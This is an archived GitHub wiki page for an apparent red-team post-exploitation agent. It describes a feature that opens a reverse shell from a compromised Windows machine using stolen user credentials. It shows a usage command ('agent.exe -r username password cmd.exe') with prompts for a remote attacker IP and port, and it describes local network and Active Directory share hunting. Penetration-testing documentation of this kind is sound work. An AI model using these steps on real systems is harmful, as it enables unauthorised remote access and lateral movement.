You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
{{ message }}
This repository has been archived by the owner on May 5, 2022. It is now read-only.
Lawrence Amer edited this page Jul 25, 2020
·
6 revisions
the newer version comes with different techniques and enhancement, and it is totally remastered from scratch to assist your pen-testing / red teaming operations.
run-as-user windows API weaponization
this feature allows starting a reverse shell directly from the compromised machine using users'account credentials with ability to keep the current session active.
agent.exe -r username password cmd.exe
[+] trying to Spawn a shell ....!
[*] set RHOST >
remoteattackerip
[*] set RPORT >
remote port
local network enumeration and share hunting
actually this feature give am accurate results in some tested environment, about sometimes firewalls will stop it from working, but it is very helpful to
retrieve information about locally connected devices and available shares in AD or local network